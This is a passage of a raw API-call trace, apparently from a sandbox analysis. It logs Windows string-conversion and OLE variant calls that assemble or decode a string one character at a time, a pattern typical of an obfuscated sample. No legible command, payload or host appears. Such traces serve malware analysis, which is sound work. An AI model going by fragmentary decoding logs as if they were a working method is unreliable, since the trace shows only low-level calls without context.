lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.105] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.106] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.106] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0173.107] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.107] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0173.108] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.108] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="%", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="%") returned 1 [0173.109] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.110] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0173.110] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.111] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0173.111] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.112] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.112] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.113] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.113] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.114] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0173.114] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.115] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0173.115] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.116] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0173.116] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.117] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.117] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.118] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.118] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.119] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.119] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.120] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="%", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="%") returned 1 [0173.120] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.121] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0173.121] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.122] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.122] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.123] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0173.123] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.124] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.124] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.125] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.125] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.126] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0173.126] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.127] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0173.127] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.128] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="3", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="3") returned 1 [0173.128] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="?", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="?\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.211] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0173.211] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.212] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0173.212] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.213] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0173.213] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.213] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0173.214] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.214] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0173.215] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.215] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0173.215] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.216] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0173.216] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.217] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="3", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="3") returned 1 [0173.217] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="?", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="?\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.218] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0173.218] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.219] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0173.219] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.220] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0173.220] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.220] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0173.221] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.221] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0173.221] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, 